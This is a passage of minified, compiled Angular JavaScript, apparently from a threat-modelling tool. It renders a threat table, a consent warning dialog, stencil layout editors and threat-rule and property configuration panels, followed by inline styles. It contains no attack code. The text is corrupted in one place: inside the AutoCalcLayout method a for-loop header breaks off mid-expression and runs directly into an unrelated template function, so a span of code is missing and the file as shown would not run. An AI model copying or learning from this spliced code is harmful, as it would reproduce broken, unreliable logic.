"),ne(63,mmt,2,1,"td",10),s(64,"\n "),Mt(),s(65,"\n "),bt(66,16),s(67,"\n "),ne(68,umt,3,3,"th",12),s(69,"\n "),ne(70,hmt,2,1,"td",10),s(71,"\n "),Mt(),s(72,"\n "),bt(73,17),s(74,"\n "),ne(75,fmt,3,3,"th",12),s(76,"\n "),ne(77,pmt,2,3,"td",18),s(78,"\n "),Mt(),s(79,"\n "),bt(80,19),s(81,"\n "),ne(82,_mt,3,3,"th",12),s(83,"\n "),ne(84,Cmt,3,1,"td",10),s(85,"\n "),Mt(),s(86,"\n "),bt(87,20),s(88,"\n "),ne(89,ymt,3,3,"th",12),s(90,"\n "),ne(91,bmt,2,3,"td",18),s(92,"\n "),Mt(),s(93,"\n "),bt(94,21),s(95,"\n "),ne(96,Mmt,3,3,"th",22),s(97,"\n "),ne(98,vmt,2,1,"td",10),s(99,"\n "),Mt(),s(100,"\n "),bt(101,23),s(102,"\n "),ne(103,Amt,3,3,"th",12),s(104,"\n "),ne(105,Emt,7,2,"td",10),s(106,"\n "),Mt(),s(107,"\n "),bt(108,24),s(109,"\n "),ne(110,Dmt,2,0,"th",22),s(111,"\n "),ne(112,xmt,6,3,"td",10),s(113,"\n "),Mt(),s(114,"\n \n "),ne(115,wmt,1,0,"tr",25),s(116,"\n "),ne(117,Imt,2,5,"tr",26),s(118,"\n "),ne(119,Rmt,6,3,"tr",27),s(120,"\n "),u(),s(121,"\n\n "),s(122,"\n "),m(123,"table",7),s(124,"\n "),bt(125,8),s(126,"\n "),ne(127,Smt,2,0,"th",9),s(128,"\n "),ne(129,kmt,5,1,"td",10),s(130,"\n "),Mt(),s(131,"\n "),bt(132,11),s(133,"\n "),ne(134,Pmt,3,3,"th",12),s(135,"\n "),ne(136,Omt,2,1,"td",10),s(137,"\n "),Mt(),s(138,"\n "),bt(139,13),s(140,"\n "),ne(141,Nmt,3,3,"th",12),s(142,"\n "),ne(143,Lmt,2,1,"td",10),s(144,"\n "),Mt(),s(145,"\n "),bt(146,14),s(147,"\n "),ne(148,zmt,2,0,"th",12),s(149,"\n "),ne(150,Wmt,6,6,"td",10),s(151,"\n "),Mt(),s(152,"\n "),bt(153,15),s(154,"\n "),ne(155,Fmt,3,3,"th",12),s(156,"\n "),ne(157,Vmt,2,1,"td",10),s(158,"\n "),Mt(),s(159,"\n "),bt(160,16),s(161,"\n "),ne(162,Bmt,3,3,"th",12),s(163,"\n "),ne(164,Hmt,2,1,"td",10),s(165,"\n "),Mt(),s(166,"\n "),bt(167,17),s(168,"\n "),ne(169,Umt,3,3,"th",12),s(170,"\n "),ne(171,qmt,2,3,"td",18),s(172,"\n "),Mt(),s(173,"\n "),bt(174,19),s(175,"\n "),ne(176,Gmt,3,3,"th",12),s(177,"\n "),ne(178,Qmt,3,1,"td",10),s(179,"\n "),Mt(),s(180,"\n "),bt(181,20),s(182,"\n "),ne(183,$mt,3,3,"th",12),s(184,"\n "),ne(185,Kmt,2,3,"td",18),s(186,"\n "),Mt(),s(187,"\n "),bt(188,21),s(189,"\n "),ne(190,Xmt,3,3,"th",22),s(191,"\n "),ne(192,Ymt,2,1,"td",10),s(193,"\n "),Mt(),s(194,"\n "),bt(195,23),s(196,"\n "),ne(197,Jmt,3,3,"th",12),s(198,"\n "),ne(199,eut,7,2,"td",10),s(200,"\n "),Mt(),s(201,"\n "),bt(202,24),s(203,"\n "),ne(204,tut,2,0,"th",22),s(205,"\n "),ne(206,iut,6,3,"td",10),s(207,"\n "),Mt(),s(208,"\n \n "),ne(209,aut,2,4,"tr",28),s(210,"\n "),u(),s(211,"\n "),u(),s(212,"\n "),it(213,"div",29),s(214," \n "),m(215,"mat-menu",null,30),s(217," \n "),ne(218,mut,89,36,"ng-template",31),s(219," \n "),u(),s(220," \n"),u()),2&e){const n=Ti(216);g(4),at("matTooltip",re(5,32,"general.Refresh")),g(7),Ct("toolBtn-Selected",i.autoRefreshThreats),at("matTooltip",re(12,34,"pages.modeling.threattable.autoRefresh")),g(7),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(19,36,"pages.modeling.filter")),g(3),F("ngIf",i.refreshingThreats),g(2),F("ngIf",i.AttackScenarios.length>0),g(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),F("dataSource",i.dataSourceActive),g(86),F("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),g(2),F("matRowDefColumns",i.displayedColumns),g(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),F("dataSource",i.dataSourceNA),g(86),F("matRowDefColumns",i.displayedColumns),g(4),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,an,Ed,Ta,Ea,oa,Hh,da,Xa,xl,Xo,qo,po,el,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%] td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})(),hut=(()=>{class t{constructor(e){this.data=e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-warning-dialog"]],decls:27,vars:19,consts:[["mat-dialog-title",""],["color","primary",3,"ngModel","ngModelChange"],["align","end"],["mat-button","",3,"disabled","mat-dialog-close"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n "),m(6,"p"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"p")(11,"mat-checkbox",1),he("ngModelChange",function(r){return i.data.consent=r}),s(12),oe(13,"translate"),u()(),s(14,"\n "),m(15,"p")(16,"mat-checkbox",1),he("ngModelChange",function(r){return i.data.remember=r}),s(17),oe(18,"translate"),u()(),s(19,"\n"),u(),s(20,"\n"),m(21,"mat-dialog-actions",2),s(22,"\n "),m(23,"button",3),s(24),oe(25,"translate"),u(),s(26,"\n"),u()),2&e&&(g(1),ke(re(2,9,"general.Warning")),g(6),ke(re(8,11,"dialog.warning.changeConfig")),g(4),F("ngModel",i.data.consent),g(1),ke(re(13,13,"dialog.warning.consent")),g(4),F("ngModel",i.data.remember),g(1),ke(re(18,15,"dialog.warning.rememberForToday")),g(6),F("disabled",!i.data.consent)("mat-dialog-close",!0),g(1),ke(re(25,17,"general.OK")))},dependencies:[Ta,Ea,br,da,vm,Am,Tm,Em,Xi]}),t})();function fut(t,a){if(1&t&&(m(0,"mat-option",8),s(1),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(i.GetElementTypeName(e))}}function put(t,a){if(1&t&&(m(0,"mat-option",8),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e.GetProperty("Name"))}}function _ut(t,a){if(1&t&&(m(0,"mat-form-field",11),s(1,"\n "),m(2,"mat-label"),s(3,"Width"),u(),s(4,"\n "),it(5,"input",12),s(6,"\n "),u()),2&t){const e=V().index,i=V(2);g(5),F("ngModel",i.selectedTypeTemplate.Layout[e].width)}}function gut(t,a){if(1&t&&(m(0,"mat-form-field",11),s(1,"\n "),m(2,"mat-label"),s(3,"Height"),u(),s(4,"\n "),it(5,"input",12),s(6,"\n "),u()),2&t){const e=V().index,i=V(2);g(5),F("ngModel",i.selectedTypeTemplate.Layout[e].height)}}function Cut(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",9),s(3,"\n "),m(4,"mat-label"),s(5),u(),s(6,"\n "),m(7,"input",10),he("ngModelChange",function(n){const c=be(e).index;return Me(V(2).selectedTypeTemplate.Layout[c].name=n)}),u(),s(8,"\n "),u(),s(9,"\n "),m(10,"mat-form-field",11),s(11,"\n "),m(12,"mat-label"),s(13,"X"),u(),s(14,"\n "),it(15,"input",12),s(16,"\n "),u(),s(17,"\n "),m(18,"mat-form-field",11),s(19,"\n "),m(20,"mat-label"),s(21,"Y"),u(),s(22,"\n "),it(23,"input",12),s(24,"\n "),u(),s(25,"\n "),ne(26,_ut,7,1,"mat-form-field",13),s(27,"\n "),ne(28,gut,7,1,"mat-form-field",13),s(29,"\n "),u()}if(2&t){const e=a.$implicit,i=a.index,n=V(2);g(5),ke(e.GetProperty("Name")),g(2),F("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.selectedTypeTemplate.Layout[i].name),g(8),F("ngModel",n.selectedTypeTemplate.Layout[i].x),g(8),F("ngModel",n.selectedTypeTemplate.Layout[i].y),g(3),F("ngIf",n.selectedTypeTemplate.Layout[i].canEditSize),g(2),F("ngIf",n.selectedTypeTemplate.Layout[i].canEditSize)}}function yut(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",1),he("ngModelChange",function(n){return be(e),Me(V().selectedTypeTemplate.ListInHWDiagram=n)}),s(3),oe(4,"translate"),u(),s(5,"\n "),it(6,"br"),s(7,"\n "),m(8,"mat-checkbox",1),he("ngModelChange",function(n){return be(e),Me(V().selectedTypeTemplate.ListInUCDiagram=n)}),s(9),oe(10,"translate"),u(),s(11,"\n "),it(12,"br"),s(13,"\n "),m(14,"mat-form-field",2),s(15,"\n "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n "),m(20,"mat-select",3),he("valueChange",function(n){return be(e),Me(V().selectedTypeTemplate.ListInElementTypeIDs=n)}),s(21,"\n "),ne(22,fut,2,2,"mat-option",4),s(23,"\n "),u(),s(24,"\n "),u(),s(25,"\n "),m(26,"mat-form-field",5),s(27,"\n "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n "),m(32,"mat-select",3),he("valueChange",function(n){return be(e),Me(V().selectedTypeTemplate.StencilTypes=n)}),s(33,"\n "),ne(34,put,2,2,"mat-option",4),s(35,"\n "),u(),s(36,"\n "),u(),s(37),oe(38,"translate"),m(39,"button",6),he("click",function(){return be(e),Me(V().AutoCalcLayout())}),oe(40,"translate"),m(41,"mat-icon"),s(42,"auto_fix_high"),u()(),s(43,"\n "),it(44,"br"),s(45,"\n "),ne(46,Cut,30,7,"div",7),s(47,"\n"),Mt()}if(2&t){const e=V();g(2),F("disabled",!e.selectedTypeTemplate.CanEditInWhichDiagram)("ngModel",e.selectedTypeTemplate.ListInHWDiagram),g(1),ke(re(4,15,"properties.ListInHWDiagram")),g(5),F("disabled",!e.selectedTypeTemplate.CanEditInWhichDiagram)("ngModel",e.selectedTypeTemplate.ListInUCDiagram),g(1),ke(re(10,17,"properties.ListInUCDiagram")),g(8),ke(re(18,19,"properties.ListInElementTypeIDs")),g(3),F("value",e.selectedTypeTemplate.ListInElementTypeIDs),g(2),F("ngForOf",e.GetElementTypes()),g(7),ke(re(30,21,"properties.StencilTypes")),g(3),F("value",e.selectedTypeTemplate.StencilTypes),g(2),F("ngForOf",e.GetStencilTypes()),g(3),ct("\n ",re(38,23,"properties.Layout")," "),g(2),at("matTooltip",re(40,25,"pages.config.stencils.calcLayout")),g(7),F("ngForOf",e.selectedTypeTemplate.StencilTypes)}}let but=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){}GetElementTypes(){let e=[];return this.selectedTypeTemplate.ListInHWDiagram&&e.push(Et.PhyProcessing,Et.PhyDataStore,Et.PhyExternalEntity,Et.PhyTrustArea,Et.PhysicalLink,Et.Interface),this.selectedTypeTemplate.ListInUCDiagram&&e.push(Et.LogProcessing,Et.LogDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogTrustArea,Et.PhyTrustArea,Et.PhysicalLink),e}GetElementTypeName(e){return Sc.ToString(e)}GetStencilTypes(){let e=this.dataService.Config.GetStencilTypes();return e.sort((i,n)=>n.IsDefault?1:i.ElementTypeID-n.ElementTypeID),e}AutoCalcLayout(){var e,Fe;if(this.selectedTypeTemplate&&(null===(e=this.selectedTypeTemplate.StencilTypes)||void 0===e?void 0:e.length)>0){let i=this.selectedTypeTemplate.StencilTypes,n=this.selectedTypeTemplate.Layout,r=i.filter(Fe=>Fe.ElementTypeID!=Et.PhyTrustArea&&Fe.ElementTypeID!=Et.LogTrustArea),d=(Fe,Ne)=>Math.ceil(Fe/Ne);const T=20,k=40,q=20,Y=140,te=75;let pe=(Fe=r.length)<=4?2:Fe<=9?3:4,Re=d(r.length,pe);for(let Fe=0,Ne=0,et=0;Fe0),g(2),at("matTooltip",re(13,9,"general.Delete"))}}function Uut(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(g(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function qut(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=V().$implicit,i=V(5);g(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function Gut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(V(5).selectedThreatRule=r)}),s(1,"\n "),m(2,"mat-icon",24),s(3),u(),s(4,"\n "),m(5,"div",25),s(6),u(),s(7,"\n "),ne(8,Uut,4,6,"div",50),s(9,"\n "),ne(10,qut,3,4,"div",50),s(11,"\n "),u()}if(2&t){const e=a.$implicit,i=V(5);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(3),ke(i.GetIcon(i.selectedElementType)),g(3),ke(e.Name),g(2),F("ngIf",0==i.GetStencilRestrictionsCount(e)),g(2),F("ngIf",i.GetStencilRestrictionsCount(e)>0)}}function jut(t,a){if(1&t&&(bt(0),s(1,"\n "),it(2,"mat-divider"),s(3,"\n "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n "),ne(8,Gut,12,9,"mat-list-item",27),s(9,"\n "),Mt()),2&t){const e=V(4);g(5),za("",e.selectedElementType.Name," ",re(6,3,"general.Threats"),""),g(3),F("ngForOf",e.elementTypeThreats)}}function Qut(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",16),s(2,"\n "),m(3,"div",17),s(4,"\n "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(V(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,Hut,17,11,"mat-list-item",47),s(16,"\n "),ne(17,jut,10,5,"ng-container",9),s(18,"\n "),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"div",22),s(22,"\n "),it(23,"app-threat-rule",48),s(24,"\n "),u(),s(25,"\n "),u(),s(26,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedType.Name," ",re(9,13,"general.Threats")," "),g(2),at("matTooltip",re(11,15,"general.Add")),g(5),F("ngForOf",e.typeThreats),g(2),F("ngIf",!e.selectedType.IsDefault),g(6),F("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",e.isTypeThreat)("canEditName",!0)}}function $ut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",55),s(1,"\n "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",25),s(6),u(),s(7,"\n "),m(8,"button",26),he("click",function(){be(e);const n=V(5);return Me(n.DeleteTemplate(n.selectedType.TemplateDFD))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n "),u()}if(2&t){const e=V(5);Ct("highlight-light",!e.theme.IsDarkMode)("highlight-dark",e.theme.IsDarkMode),at("matTooltip",e.selectedType.TemplateDFD.Name),g(6),ke(e.selectedType.TemplateDFD.Name),g(2),at("matTooltip",re(9,7,"general.Delete"))}}function Kut(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(V(5).selectedType.TemplateDFD.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Xut(t,a){1&t&&it(0,"app-stencil-type-template",56),2&t&&F("selectedTypeTemplate",V(5).selectedType.TemplateDFD)}function Yut(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",16),s(2,"\n "),m(3,"div",17),s(4,"\n "),m(5,"mat-list",51),s(6,"\n "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",52),he("click",function(){return be(e),Me(V(4).AddTemplateDFD())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,$ut,13,9,"mat-list-item",53),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"div",22),s(20,"\n "),m(21,"div",31),s(22,"\n "),m(23,"mat-form-field",32),s(24,"\n "),m(25,"mat-label"),s(26),oe(27,"translate"),u(),s(28,"\n "),m(29,"input",54),he("ngModelChange",function(n){return be(e),Me(V(4).selectedType.TemplateDFD.Name=n)}),u(),s(30,"\n "),ne(31,Kut,6,3,"button",34),s(32,"\n "),u(),s(33,"\n "),it(34,"br"),s(35,"\n "),ne(36,Xut,1,1,"app-stencil-type-template",8),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),u(),s(40,"\n ")}if(2&t){const e=V(4);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedType.Name," ",re(9,14,"pages.config.stencils.DFDTemplate")," "),g(2),at("matTooltip",re(11,16,"general.Add")),F("disabled",!!e.selectedType.TemplateDFD),g(5),F("ngIf",e.selectedType.TemplateDFD),g(11),ke(re(27,18,"properties.Name")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedType.TemplateDFD.Name),g(2),F("ngIf",e.selectedType.TemplateDFD.Name),g(5),F("ngIf",e.selectedType.TemplateDFD)}}function Jut(t,a){if(1&t&&(m(0,"mat-tab",13),oe(1,"translate"),s(2,"\n "),ne(3,Yut,41,20,"ng-template",14),s(4,"\n "),u()),2&t){const e=V(3);Kc("label","",re(1,2,"pages.config.stencils.DFDTemplate")," ",e.selectedType.TemplateDFD?"(1)":"","")}}function Zut(t,a){if(1&t){const e=Ye();m(0,"mat-tab-group",12),he("selectedIndexChange",function(n){return be(e),Me(V(2).SetSelectedTabIndex(n))}),s(1,"\n "),m(2,"mat-tab",13),oe(3,"translate"),s(4,"\n "),ne(5,Fut,29,15,"ng-template",14),s(6,"\n "),u(),s(7,"\n "),m(8,"mat-tab",13),oe(9,"translate"),s(10,"\n "),ne(11,Qut,27,17,"ng-template",14),s(12,"\n "),u(),s(13,"\n "),ne(14,Jut,5,4,"mat-tab",15),s(15,"\n "),u()}if(2&t){const e=V(2);F("selectedIndex",e.GetSelectedTabIndex()),g(2),Kc("label","",re(3,6,"general.Properties")," (",null==e.selectedType||null==e.selectedType.Properties?null:e.selectedType.Properties.length,")"),g(6),Kc("label","",re(9,8,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")"),g(6),F("ngIf",61==e.selectedType.ElementTypeID)}}function eht(t,a){1&t&&it(0,"app-stencil-type-template",56),2&t&&F("selectedTypeTemplate",V(2).selectedTypeTemplate)}function tht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",23),he("click",function(){const r=be(e).$implicit;return Me(V(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(V(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",24),s(4,"arrow_right"),u(),s(5,"\n "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n "),m(14,"button",26),he("click",function(){const r=be(e).$implicit;return Me(V(4).DeleteProperty(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,9,e.DisplayName)),g(7),ke(re(8,11,e.DisplayName)),g(4),za("",e.Type,": ",re(12,13,i.GetElementPropertyValue(e)),""),g(3),at("matTooltip",re(15,15,"general.Delete"))}}function iht(t,a){1&t&&(m(0,"mat-icon",30),s(1,"update"),u())}function aht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(V(5).selectedProperty=r)}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",24),s(4),u(),s(5,"\n "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n "),ne(14,iht,2,0,"mat-icon",29),s(15,"\n "),u()}if(2&t){const e=a.$implicit,i=V(5);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,10,e.DisplayName)),g(4),ke(i.GetIcon(i.defaultProtocol)),g(3),ke(re(8,12,e.DisplayName)),g(4),za("",e.Type,": ",re(12,14,i.GetElementPropertyValue(e)),""),g(3),F("ngIf",i.IsPropOverwritten(e))}}function nht(t,a){if(1&t&&(bt(0),s(1,"\n "),it(2,"mat-divider"),s(3,"\n "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n "),ne(8,aht,16,16,"mat-list-item",27),s(9,"\n "),Mt()),2&t){const e=V(4);g(5),za("",e.defaultProtocol.Name," ",re(6,3,"general.Properties"),""),g(3),F("ngForOf",e.defaultProtocol.Properties)}}function oht(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(V(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function rht(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e)}}function sht(t,a){if(1&t){const e=Ye();bt(0),s(1),oe(2,"translate"),m(3,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(V(5).selectedProperty.DefaultValue=n)}),u(),Mt()}if(2&t){const e=V(5);g(1),ct("",re(2,2,"general.DefaultValue"),": "),g(2),F("ngModel",e.selectedProperty.DefaultValue)}}function cht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",31),s(3,"\n "),m(4,"mat-form-field",32),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"input",57),he("ngModelChange",function(n){return be(e),Me(V(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n "),ne(12,oht,6,3,"button",34),s(13,"\n "),u(),s(14,"\n "),it(15,"br"),s(16,"\n "),m(17,"mat-form-field",32),s(18,"\n "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n "),m(23,"mat-select",35),he("valueChange",function(n){return be(e),Me(V(4).selectedProperty.Type=n)}),s(24,"\n "),ne(25,rht,2,2,"mat-option",36),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n "),it(29,"br"),s(30,"\n "),ne(31,sht,4,4,"ng-container",9),s(32,"\n "),it(33,"br"),s(34),oe(35,"translate"),m(36,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(V(4).selectedProperty.Editable=n)}),u(),s(37,"\n "),u(),s(38,"\n "),Mt()}if(2&t){const e=V(4);g(7),ke(re(8,11,"general.PropertyName")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),g(2),F("ngIf",e.selectedProperty.DisplayName),g(8),ke(re(21,13,"general.Type")),g(3),at("matTooltip",e.selectedProperty.Type),F("value",e.selectedProperty.Type),g(2),F("ngForOf",e.GetPropertyTypes()),g(6),F("ngIf","Check Box"==e.selectedProperty.Type),g(3),ct("\n ",re(35,15,"general.Editable"),": "),g(2),F("ngModel",e.selectedProperty.Editable)}}function lht(t,a){if(1&t){const e=Ye();bt(0,42),s(1,"\n "),m(2,"button",43),he("click",function(){return be(e),Me(V(5).OverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n "),Mt()}2&t&&(g(3),ke(re(4,1,"pages.config.overwriteProp")))}function dht(t,a){if(1&t){const e=Ye();bt(0),s(1),m(2,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(V(6).currentPropertyOverwriting.Value=n)}),u(),Mt()}if(2&t){const e=V(6);g(1),ct("",e.selectedProperty.DisplayName,": "),g(1),F("ngModel",e.currentPropertyOverwriting.Value)}}function mht(t,a){if(1&t){const e=Ye();bt(0,42),s(1," \n "),m(2,"button",43),he("click",function(){return be(e),Me(V(5).UnOverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"div",44),s(7,"\n "),ne(8,dht,3,2,"ng-container",9),s(9,"\n "),u(),s(10,"\n "),Mt()}if(2&t){const e=V(5);g(3),ke(re(4,2,"pages.config.removeOverwriting")),g(5),F("ngIf","Check Box"==e.selectedProperty.Type)}}function uht(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"div",31),s(3,"\n "),ne(4,lht,6,3,"ng-container",41),s(5,"\n 